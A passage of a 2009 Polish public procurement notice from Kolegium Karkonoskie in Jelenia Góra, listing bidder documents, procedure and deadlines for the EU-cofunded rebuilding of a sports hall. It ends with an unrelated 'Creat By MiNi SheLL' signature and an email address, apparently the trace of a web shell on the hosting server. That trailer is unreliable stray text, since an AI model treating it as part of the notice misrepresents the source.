Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) muszą spełnić warunek wspólnie.
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.8. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) muszą spełnić warunek wspólnie.
5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.9. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) muszą spełnić warunek wspólnie.
6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. Zamawiający dokona na podstawie oświadczeń wymienionych w pkt VI. ppkt 1.1. SIWZ.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-    zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-    zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-    zgodnie z pkt VI. ppkt 1.3. SIWZ -  aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia

-   zgodnie z pkt VI. ppkt 1.4. SIWZ - Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie (wymagane jest wykazanie minimum jednego kontraktu) - wypełniony ZAŁĄCZNIK NR 3 do SIWZ
Uwaga:
a)	W wykazie należy wymienić usługi potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia,
b)	Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie,
c)	 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia.

-   zgodnie z pkt VI. ppkt 1.5. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - wypełniony ZAŁĄCZNIK NR 4 do SIWZ
Uwaga:
a)	Na potwierdzenie spełniania warunku określonego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W wykazie osób dla osób, o których mowa w pkt V. pkt 2. b) SIWZ należy podać liczbę lat doświadczenia zawodowego oraz dodatkowo:
- dla osoby, o której mowa w pkt V. pkt. 2. b) ppkt 1. SIWZ należy podać liczbę lat doświadczenia zawodowego w zakresie zarządzania projektami współfinansowanymi przez Unię Europejską dla robót budowlanych oraz wykazać doświadczenie w nadzorowaniu przynajmniej jednym kontraktem związanym z inwestycją o wartości robót budowlanych minimum 8 000 000,00 zł brutto ,
- 	dla osób, o których mowa w pkt V. pkt. 2.b) ppkt od 2 do 5 SIWZ należy podać liczbę lat doświadczenia zawodowego jako inspektor nadzoru inwestorskiego,
- dla osoby, o której mowa w pkt V.pkt. 2.b) ppkt 6. SIWZ należy podać liczbę lat doświadczenia zawodowego w zakresie rozliczeń finansowych
 i sprawozdawczości z tytułu realizacji projektów współfinansowanych przez Unię Europejską.
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	Dla osób wymienionych w wykazie, o którym mowa w pkt VI. ppkt 1.5. SIWZ, z wyjątkiem inżyniera oraz  pracownika ds. rozliczeń finansowych i sprawozdawczości, należy złożyć z ofertą dokumenty potwierdzające spełnianie warunku wymienionego w pkt V. pkt 2.b) SIWZ, tj.: decyzje 
o nadaniu wymaganych uprawnień budowlanych oraz zaświadczenia
 o przynależności do właściwej izby samorządu zawodowego
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

- zgodnie z pkt VI. ppkt 1.8. SIWZ - Części sprawozdania finansowego, tj. Bilans oraz Rachunek zysków i strat, a jeżeli część ta podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o tej części sprawozdania finansowego, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
	Uwaga:
a)  Wyżej wymienione dokumenty Wykonawcy składają za ostatnie 3 lata obrotowe, za które Wykonawcy mają sporządzone sprawozdanie finansowe i które byli zobligowani wykonać.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia. 

- zgodnie z pkt VI. ppkt 1.9. SIWZ - Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 3. ppkt b) ogłoszenia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:
1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. oraz ppkt 1.3. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne  albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu,
3) nie orzeczono wobec niego zakazu ubiegania się i zamówienie.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kk.jgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kolegium Karkonoskie w Jeleniej Górze
ul. Lwówecka 18
58-503 Jelenia Góra
Budynek nr 1 (Rektorat) - pok. 114.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 12:00, miejsce: Kolegium Karkonoskie w Jeleniej Górze
ul. Lwówecka 18
58-503 Jelenia Góra
budynek nr 1 - Rektorat, pokój 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że zamówienie dotyczy Projektu pod nazwą: Przebudowa 
i rozbudowa hali sportowej zlokalizowanej w kompleksie uczelnianym Kolegium Karkonoskiego w Jeleniej Górze przy ul. Lwóweckiej 18, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,

Creat By MiNi SheLL
Email: jattceo@gmail.com